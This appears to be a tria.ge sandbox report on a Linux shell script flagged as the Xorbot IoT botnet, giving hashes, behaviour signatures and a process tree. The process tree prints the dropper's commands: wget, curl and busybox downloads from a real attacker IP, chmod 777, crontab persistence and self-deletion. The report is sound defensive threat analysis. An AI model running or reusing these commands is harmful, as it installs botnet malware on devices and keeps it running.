Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240508-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    28/02/2025, 06:22

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    74e19a07a6f06527a755064e902a5b45

  • SHA1

    fdbb2989f0ce113278b0df08ad6b9fdb2f9240b1

  • SHA256

    0c1a0ababd6c481377018db4947b0ee4d22d820106e7e8932825ef3dc27d704d

  • SHA512

    d25e290d64a454f44d950f75a931a00c482517dae81453675ce54d6ec589ccdaca831d2d459b9992859d94bdcbd95c9fe3d888c002311c17ca851ea2659877a3

  • SSDEEP

    192:UttSrhgGIWhWFWYW/W3WBViarAMMICuxTzyhfH2R9Jb7Exdvb7ExdHtTz0fH2R9/:UttSrhgGIWhWFWYW/W3WB6ICukhfH2R9

Malware Config

Signatures

  • Detects Xorbot 1 IoCs
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

  • Xorbot family
  • Contacts a large (818) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Renames itself 1 IoCs
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
    • Executes dropped EXE
    • Renames itself
    • Reads runtime system information
    PID:1516
    • /bin/rm
      /bin/rm bins.sh
      2⤵
        PID:1517
      • /usr/bin/wget
        wget http://37.44.238.88/bins/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb
        2⤵
        • Writes file to tmp directory
        PID:1518
      • /usr/bin/curl
        curl -O http://37.44.238.88/bins/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb
        2⤵
        • Writes file to tmp directory
        PID:1519
      • /bin/busybox
        /bin/busybox wget http://37.44.238.88/bins/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb
        2⤵
        • Writes file to tmp directory
        PID:1523
      • /bin/chmod
        chmod 777 rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb
        2⤵
        • File and Directory Permissions Modification
        PID:1524
      • /usr/bin/crontab
        crontab -l
        2⤵
          PID:1528
        • /usr/bin/crontab
          crontab -
          2⤵
          • Creates/modifies Cron job
          PID:1530
        • /bin/rm
          rm rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb
          2⤵
            PID:1532
          • /usr/bin/wget
            wget http://37.44.238.88/bins/bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL
            2⤵
              PID:1535

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • /tmp/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb

            Filesize

            99KB

            MD5

            9438d9bc392bcf300a5583b6df5bc8f6

            SHA1

            375a6ae34b516f6f3eeea8030c4084f585017efa

            SHA256

            68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e

            SHA512

            1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860

          • /var/spool/cron/crontabs/tmp.0a5FxA

            Filesize

            210B

            MD5

            319f67d1e9aedd05915dbb7428310c7a

            SHA1

            5955ba71ccb0ee4f7e957a029a088c4bb2ad4c7a

            SHA256

            88657960965de85c0ccb9fb7c5cff8bac05bb9667959f8ff12ef0429285f8d0c

            SHA512

            c469c53d6713d7c5ad9c7d05fdf3873473270fe115c7918f7acd37a9726eb8a1c83d572c0cd17139f3d09b205c956e95079cf5e0c570e70289db315900496e97